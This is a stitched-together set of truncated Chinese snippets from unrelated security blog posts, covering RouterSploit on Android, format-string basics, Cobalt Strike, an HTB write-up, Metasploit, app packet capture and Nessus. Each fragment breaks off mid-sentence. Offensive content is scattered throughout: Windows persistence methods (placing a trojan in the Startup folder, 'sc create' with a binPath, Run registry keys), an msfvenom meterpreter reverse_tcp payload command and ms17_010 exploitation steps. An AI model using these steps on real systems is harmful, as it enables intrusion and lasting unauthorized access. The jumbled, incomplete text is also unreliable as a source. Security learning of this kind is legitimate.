和Metasploit差不多，RouterSploit是一个强大的漏洞利用框架，用于快速识别和利用路由器中的普通漏洞，它还有个亮点，就是可以在绝大多数安卓设备上运行。如果你想在电脑上运行，可以阅读这篇文章，而这篇教程则会告诉你如何轻松地在未Root的安卓设备上安装RouterSploit，这样一来，只要你的智能手机可以连接这些有漏洞的路由器，你就可以渗透他们。RouterSploitvs路由器路由器是我们联通世界的通道，它们管理着互联网通信，加密我们的流量，保护着我们的隐私，还将我们与内网的或者外网的其他设备连接起来。很大一部分人认为这种设备如此出色是理所当然的，还认为只要一接入并提供互联网，

相信学习过C语言的童鞋儿们，都有接触过比较基础的输入输出函数（例如，scanf和printf等），那么对于%s、%d、%f、%c、%x等格式化符号应该并不会感到陌生。学习过汇编语言，并且有逆向工程基础的童鞋儿们，应该都对C语言翻译成汇编语言代码的大概格式会有所了解！我们应该知道，函数参数和函数内部的局部变量的值内容都是存储在栈中的。不知道”栈“这个名词的童鞋儿们可以去学习下数据结构中的”栈结构“，这是非常重要的基础知识！必须要理解并且熟练掌握！”栈结构“的”先进后出“原则，大家一定要深入理解！对于函数参数而言，在32位操作系统中，最后一个参数最先入栈，第一个参数最后入栈，第一个参数最先出栈，最

0x01权限维持-自启动以下几种方法都需服务器重启1、自启动路径加载C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup将木马放到此目录，等待服务器重启即可2、自启动服务加载sccreateServiceTestbinPath=C:\1.exestart=autoscdeleteServiceTest3、自启动注册表加载-当前用户键值HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run-服务器键值（需要管理员

CobaltStrike介绍：CobaltStrike是一款渗透测试神器，被业界人称为CS神器。CobaltStrike分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描，自动化溢出，多模式端口监听，windowsexe木马生成，windowsdll木马生成，java木马生成，office宏病毒生成，木马捆绑。钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等强大的功能！CobaltStrike安装：环境要求：需要安装Java环境需要开启服务端和客户端汉化版：https://pan.baidu.c

AD-Multimaster0x00前言本小白最近在学域渗透，决定把HackTheBox的ActiveDirectory101系列域渗透靶机打完，并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇，靶机名字为Multimaster，这是一台疯狂难度的靶机。0x01信息搜集端口及服务扫描nmap-sC-sV-p-10.10.10.179-T4-oAnmap_multimasterNmapscanreportfor10.10.10.179Hostisup(0.20slatency).Notshown:65513filteredportsPORTSTATESERVICEVERS

『渗透测试基础』|什么是渗透测试？有哪些常用方法？如何开展？测试工具有哪些？优势在哪里？1什么是渗透测试？2有哪些常用方法？2.1针对性测试2.2外部测试2.3内部测试2.4盲测2.5双盲测试3如何开展渗透测试？3.1规划和侦查3.2安全扫描3.3获取访问权限3.4维持访问权限3.5入侵分析4常用的渗透测试工具有哪些？4.1Nmap4.1.1简介4.1.2主要功能4.1.3一些命令4.1.4基本扫描方式4.2Aircrack-ng4.2.1简介4.2.2aircrack-ng套件4.3sqlmap4.3.1简介4.3.2注入模式4.3.3一些命令4.4Wifiphisher4.5AppScan

1.search漏洞名称或者代号，永恒之蓝的是ms17_010（win10和win11无这个漏洞），exploit攻击利用脚本是进行漏洞攻击,auxiliary辅助是检测漏洞是否存在2.use模块前面的数字或者全称3.查看当前模块的设置，showoptions4.关闭目标机win8的防火墙，ping通kali5.用setRHOSTS目标机ip地址，把win8设置为目标机win8出现的问题：渗透之路暂时终止，等我找到能用的win7镜像再继续在终端sudosu输入密码后写一句话木马：msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=192.168

文章目录前言一、安装夜神模拟器二、夜神模拟器配置三、安装证书与所需软件四、测试抓包总结前言不想说了，反正我吐了，直接看正文吧。提示：以下是本篇文章正文内容，下面案例可供参考一、安装夜神模拟器mac上是安装不成功的，哪怕是mac版的夜神模拟器，下载下来一直卡99%，要是你能在mac上面安装成功夜神，你视频发我，我V你5元。还是windows好用，所以我直接装了个虚拟机，虚拟机一定要开虚拟化，否则也是99%。ParallelsDesktop的windwos虚拟机怎么开虚拟化？看下面👇🏻！打开控制中心：设置-硬件-CPU与内存-高级虚拟机监控程序选择Parallels，然后构上“启用nestedu虚

文章目录一、概述二、使用电脑版微信获取小程序源码三、使用工具解密源码四、配置nodejs环境五、使用工具解包一、概述微信小程序渗透时，因为小程序没有网页端页面，所以不能直接访问抓包分析，如果需要抓包分析，那么一般就是用电脑上的安卓模拟器登录微信利用burp抓包、要么就是用burp抓手机的包、要么就是从手机上直接抓包。方式方法有很多种，个人一般用来抓包的工具也就是IOS上用Stream软件，或者是Postman等工具很容易就抓包了。接下来主要介绍的时微信小程序的反编译，因为反编译出来可以看到小程序的前端源码，可以渗透出更多的东西。二、使用电脑版微信获取小程序源码具体的操作是这样的：大概在微信的这

前置条件：Nessus工具使用前要确保工具是服务状态systemctlstartnessusd.service 启动nessus服务systemctlstatusnessusd.service 查看nessus服务状态1.配置扫描模板2.新增高级扫描2.1设置日程表：2.2设置邮件收件人(可选)：2.3主机发现：2.